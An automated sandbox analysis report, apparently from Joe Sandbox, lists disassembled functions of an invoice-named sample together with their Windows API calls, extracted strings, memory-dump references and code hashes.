                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: ItemMenu$Info$CheckCountRadioSleep_memset
                                          • String ID:
                                          • API String ID: 4176008265-0
                                          • Opcode ID: b0f46b9daa1905a6cfa597ce9f08befe4fcaea4ae8b00d429bdca1168be675da
                                          • Instruction ID: d041e2a6511ad081bd824cff42eca7b157938f8ca15e77e0b80393dec237999e
                                          • Opcode Fuzzy Hash: b0f46b9daa1905a6cfa597ce9f08befe4fcaea4ae8b00d429bdca1168be675da
                                          • Instruction Fuzzy Hash: 3361B470900A49BFDB11CF64CE84DBF7BB8FB01345F14046AE842A7251E7B9AD05DB2A
                                          Function 00486F23 Relevance: 16.7, APIs: 11, Instructions: 184windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00486FA5
                                          • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00486FA8
                                          • GetWindowLongW.USER32(?,000000F0), ref: 00486FCC
                                          • _memset.LIBCMT ref: 00486FDD
                                          • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00486FEF
                                          • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00487067
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: MessageSend$LongWindow_memset
                                          • String ID:
                                          • API String ID: 830647256-0
                                          • Opcode ID: 4336d240a59bbb388c973f46f1178136a6457c7e14c292988be6c5ed4532a5ee
                                          • Instruction ID: 7132dcb9391edd1f4fca7d59f8acd98ed1f58d557d43f29f177e0b8d5bde9df6
                                          • Opcode Fuzzy Hash: 4336d240a59bbb388c973f46f1178136a6457c7e14c292988be6c5ed4532a5ee
                                          • Instruction Fuzzy Hash: 17618E75900208AFDB10EFA4CC85EEE77B8EB09700F20056AFA14A73A1C775AD51DB64
                                          Function 00456B98 Relevance: 16.6, APIs: 11, Instructions: 123memoryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 00456BBF
                                          • SafeArrayAllocData.OLEAUT32(?), ref: 00456C18
                                          • VariantInit.OLEAUT32(?), ref: 00456C2A
                                          • SafeArrayAccessData.OLEAUT32(?,?), ref: 00456C4A
                                          • VariantCopy.OLEAUT32(?,?), ref: 00456C9D
                                          • SafeArrayUnaccessData.OLEAUT32(?), ref: 00456CB1
                                          • VariantClear.OLEAUT32(?), ref: 00456CC6
                                          • SafeArrayDestroyData.OLEAUT32(?), ref: 00456CD3
                                          • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00456CDC
                                          • VariantClear.OLEAUT32(?), ref: 00456CEE
                                          • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00456CF9
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                          • String ID:
                                          • API String ID: 2706829360-0
                                          • Opcode ID: f1379b8d06b3f903a5e910e956f09b0d2a9745292c14bd0cd64e072d7f41818e
                                          • Instruction ID: 21fd5a8c16b11a42553d074c3324144f158a868588d4a73b9a3ed32873cef97c
                                          • Opcode Fuzzy Hash: f1379b8d06b3f903a5e910e956f09b0d2a9745292c14bd0cd64e072d7f41818e
                                          • Instruction Fuzzy Hash: F1418231A001199FCF00DFA9D8449AEBBB9EF18315F01847EE955E7362CB34A949CF94
                                          Function 004783BB Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 197comCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00409837: __itow.LIBCMT ref: 00409862
                                            • Part of subcall function 00409837: __swprintf.LIBCMT ref: 004098AC
                                          • CoInitialize.OLE32 ref: 00478403
                                          • CoUninitialize.OLE32 ref: 0047840E
                                          • CoCreateInstance.OLE32(?,00000000,00000017,00492BEC,?), ref: 0047846E
                                          • IIDFromString.OLE32(?,?), ref: 004784E1
                                          • VariantInit.OLEAUT32(?), ref: 0047857B
                                          • VariantClear.OLEAUT32(?), ref: 004785DC
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
                                          • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                          • API String ID: 834269672-1287834457
                                          • Opcode ID: c04c75621ce49cc5f6b0995f70e74a0e3f94a869c5641639a45c403aad8c8130
                                          • Instruction ID: cb75df2b24e16c1c2e0b5d8d850f15e0fc33cba1d2aa6ec0deb68a9cf625d14d
                                          • Opcode Fuzzy Hash: c04c75621ce49cc5f6b0995f70e74a0e3f94a869c5641639a45c403aad8c8130
                                          • Instruction Fuzzy Hash: AA61C170648312AFC710DF14C848B9FB7E8AF44744F00881EF9899B291DB78ED48CB9A
                                          Function 00475732 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 163networkfileCOMMON
                                          Download Yara Rule
                                          APIs
                                          • WSAStartup.WSOCK32(00000101,?), ref: 00475793
                                          • inet_addr.WSOCK32(?,?,?), ref: 004757D8
                                          • gethostbyname.WSOCK32(?), ref: 004757E4
                                          • IcmpCreateFile.IPHLPAPI ref: 004757F2
                                          • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00475862
                                          • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00475878
                                          • IcmpCloseHandle.IPHLPAPI(00000000), ref: 004758ED
                                          • WSACleanup.WSOCK32 ref: 004758F3
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                          • String ID: Ping
                                          • API String ID: 1028309954-2246546115
                                          • Opcode ID: 8c1f62a028f67a861641f920bff49acae339ba4ee59605ba5ff9b7a17a6566e8
                                          • Instruction ID: e00705f4e0379358c1930da5d1710ca1d0dba9501fb2cabd0d468b8ffa352f64
                                          • Opcode Fuzzy Hash: 8c1f62a028f67a861641f920bff49acae339ba4ee59605ba5ff9b7a17a6566e8
                                          • Instruction Fuzzy Hash: 08519F716006009FD710AF25DC45B6A77E4EF48714F05892EF95AEB3A1DB78EC14CB4A
                                          Function 0046B4C3 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 98COMMON
                                          Download Yara Rule
                                          APIs
                                          • SetErrorMode.KERNEL32(00000001), ref: 0046B4D0
                                          • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 0046B546
                                          • GetLastError.KERNEL32 ref: 0046B550
                                          • SetErrorMode.KERNEL32(00000000,READY), ref: 0046B5BD
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: Error$Mode$DiskFreeLastSpace
                                          • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                          • API String ID: 4194297153-14809454
                                          • Opcode ID: eccad1696ba090c5711fa55b6348286b496d6d94020a94e73532c489e0c9eeb3
                                          • Instruction ID: 3fb85926d1a8df40b98e85eadc692d0a6e2328ff5e483d9ffe01cb822ebdbf3c
                                          • Opcode Fuzzy Hash: eccad1696ba090c5711fa55b6348286b496d6d94020a94e73532c489e0c9eeb3
                                          • Instruction Fuzzy Hash: 29318675A00205AFCB00EB68C845AEE77B4FF45318F10416BF506D7291EB799E86CB9A
                                          Function 00458F8F Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 82windowCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00407DE1: _memmove.LIBCMT ref: 00407E22
                                            • Part of subcall function 0045AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0045AABC
                                          • SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 00459014
                                          • GetDlgCtrlID.USER32 ref: 0045901F
                                          • GetParent.USER32 ref: 0045903B
                                          • SendMessageW.USER32(00000000,?,00000111,?), ref: 0045903E
                                          • GetDlgCtrlID.USER32(?), ref: 00459047
                                          • GetParent.USER32(?), ref: 00459063
                                          • SendMessageW.USER32(00000000,?,?,00000111), ref: 00459066
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: MessageSend$CtrlParent$ClassName_memmove
                                          • String ID: ComboBox$ListBox
                                          • API String ID: 1536045017-1403004172
                                          • Opcode ID: e527cb334e7d7689371befb81d6d0d32f7406071002c3aa4a78959359ae4abf1
                                          • Instruction ID: 6714b25adca5f569a88cfbaafbe7bd2dd1ba81f724cd7e2599907f028ed7346a
                                          • Opcode Fuzzy Hash: e527cb334e7d7689371befb81d6d0d32f7406071002c3aa4a78959359ae4abf1
                                          • Instruction Fuzzy Hash: D021D870A00108BFDF04ABA1CC85EFEB774EF45310F10062AF911672E2DB795819DB28
                                          Function 0045907A Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 81windowCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00407DE1: _memmove.LIBCMT ref: 00407E22
                                            • Part of subcall function 0045AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0045AABC
                                          • SendMessageW.USER32(?,00000186,00000002,00000000), ref: 004590FD
                                          • GetDlgCtrlID.USER32 ref: 00459108
                                          • GetParent.USER32 ref: 00459124
                                          • SendMessageW.USER32(00000000,?,00000111,?), ref: 00459127
                                          • GetDlgCtrlID.USER32(?), ref: 00459130
                                          • GetParent.USER32(?), ref: 0045914C
                                          • SendMessageW.USER32(00000000,?,?,00000111), ref: 0045914F
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: MessageSend$CtrlParent$ClassName_memmove
                                          • String ID: ComboBox$ListBox
                                          • API String ID: 1536045017-1403004172
                                          • Opcode ID: 788820521d6cad1a15555ef376c01a576536d52651f0e806491d71d2e8ddf36c
                                          • Instruction ID: 4d8cd3b83cca1d69534b37f7086261ba2dc9307f4c099413b547fbd15d3c7d68
                                          • Opcode Fuzzy Hash: 788820521d6cad1a15555ef376c01a576536d52651f0e806491d71d2e8ddf36c
                                          • Instruction Fuzzy Hash: AA21B674A00108BFDF01ABA5CC85EFEBB74EF44301F50452BB911A72A2DB795819DB29
                                          Function 00459163 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 72windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetParent.USER32 ref: 0045916F
                                          • GetClassNameW.USER32(00000000,?,00000100), ref: 00459184
                                          • _wcscmp.LIBCMT ref: 00459196
                                          • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00459211
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: ClassMessageNameParentSend_wcscmp
                                          • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                          • API String ID: 1704125052-3381328864
                                          • Opcode ID: ea2da3042022fb33e5a84bdcfd4780e66fcf499551f9b63f672fb9db9d77b33f
                                          • Instruction ID: f102ea4107ca07b1db40aa5d7e68bb0b9a0f71bc8f584d68d6a8224326f4a83e
                                          • Opcode Fuzzy Hash: ea2da3042022fb33e5a84bdcfd4780e66fcf499551f9b63f672fb9db9d77b33f
                                          • Instruction Fuzzy Hash: 3111E776248317F9FA112624EC06DAB379CAB15721F30046BFD00E40D2FEA95C56666C
                                          Function 004611CE Relevance: 15.1, APIs: 10, Instructions: 89threadCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetCurrentThreadId.KERNEL32 ref: 004611F0
                                          • GetForegroundWindow.USER32(00000000,?,?,?,?,?,00460268,?,00000001), ref: 00461204
                                          • GetWindowThreadProcessId.USER32(00000000), ref: 0046120B
                                          • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00460268,?,00000001), ref: 0046121A
                                          • GetWindowThreadProcessId.USER32(?,00000000), ref: 0046122C
                                          • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00460268,?,00000001), ref: 00461245
                                          • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00460268,?,00000001), ref: 00461257
                                          • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,00460268,?,00000001), ref: 0046129C
                                          • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00460268,?,00000001), ref: 004612B1
                                          • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00460268,?,00000001), ref: 004612BC
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                          • String ID:
                                          • API String ID: 2156557900-0
                                          • Opcode ID: 2caf1bd63dccf00636a063d85e3956ee9e2a291adaf0d7952c1a55c89920e2b2
                                          • Instruction ID: 1e48a1bdefc3aaf7905b324a82868e76ea33fb60fcd143e126220ea2d996acdd
                                          • Opcode Fuzzy Hash: 2caf1bd63dccf00636a063d85e3956ee9e2a291adaf0d7952c1a55c89920e2b2
                                          • Instruction Fuzzy Hash: 2B31D275600208BFDB109F54EC98F6A37A9EF54315F1582BEFA00E62B0E7789D448B5E
                                          Function 00479113 Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 263COMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: Variant$ClearInit$_memset
                                          • String ID: ,,I$Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                          • API String ID: 2862541840-2080382077
                                          • Opcode ID: ff95da20181f441a164f6629f45453e3d508d42e8a1a97fb14f9fa89a57037a5
                                          • Instruction ID: ae80b45066e4f78fbd037e562a23a34cf658a5e22d7790f01f39a3ab0041c2b1
                                          • Opcode Fuzzy Hash: ff95da20181f441a164f6629f45453e3d508d42e8a1a97fb14f9fa89a57037a5
                                          • Instruction Fuzzy Hash: 62919E30A00205ABDF20DFA1C848FEFB7B8EF49714F10855EE909AB281D7789D05CBA4
                                          Function 0045A068 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 241COMMON
                                          Download Yara Rule
                                          APIs
                                          • EnumChildWindows.USER32(?,0045A439), ref: 0045A377
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: ChildEnumWindows
                                          • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                          • API String ID: 3555792229-1603158881
                                          • Opcode ID: 1424eacf5de64af2c769219169cfdcdf02d038a0872950fffdd1f519614ed5ca
                                          • Instruction ID: 7454df241f77d0b93e78cd2df6a08ba454d4c5e8e9c0a671585cc9aba64ec447
                                          • Opcode Fuzzy Hash: 1424eacf5de64af2c769219169cfdcdf02d038a0872950fffdd1f519614ed5ca
                                          • Instruction Fuzzy Hash: BA91BB70600505AADB08DF61C452BEEF774BF04305F54822FEC59A7242DB3969ADCB99
                                          Function 00402E26 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 186windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • SetWindowLongW.USER32(?,000000EB), ref: 00402EAE
                                            • Part of subcall function 00401DB3: GetClientRect.USER32(?,?), ref: 00401DDC
                                            • Part of subcall function 00401DB3: GetWindowRect.USER32(?,?), ref: 00401E1D
                                            • Part of subcall function 00401DB3: ScreenToClient.USER32(?,?), ref: 00401E45
                                          • GetDC.USER32 ref: 0043CD32
                                          • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 0043CD45
                                          • SelectObject.GDI32(00000000,00000000), ref: 0043CD53
                                          • SelectObject.GDI32(00000000,00000000), ref: 0043CD68
                                          • ReleaseDC.USER32(?,00000000), ref: 0043CD70
                                          • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 0043CDFB
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                          • String ID: U
                                          • API String ID: 4009187628-3372436214
                                          • Opcode ID: 3cdb49cb97ee06b786ec44539fc98b371f27cf3cd913876941f0ba4c68568fc2
                                          • Instruction ID: a06c30b2c7428a2a0e02ce49fef1101dc5652c1e0a779c9989b3b0b616dc9c80
                                          • Opcode Fuzzy Hash: 3cdb49cb97ee06b786ec44539fc98b371f27cf3cd913876941f0ba4c68568fc2
                                          • Instruction Fuzzy Hash: 8A71CB31400205DFCF219F64C884AAB3BB5FF48324F14567BFD55AA2A6C7389881DBA9
                                          Function 00478C46 Relevance: 13.9, APIs: 9, Instructions: 438COMMON
                                          Download Yara Rule
                                          APIs
                                          • GetModuleFileNameW.KERNEL32(?,?,00000104,?,0048F910), ref: 00478D28
                                          • FreeLibrary.KERNEL32(00000000,00000001,00000000,?,0048F910), ref: 00478D5C
                                          • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 00478ED6
                                          • SysFreeString.OLEAUT32(?), ref: 00478F00
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
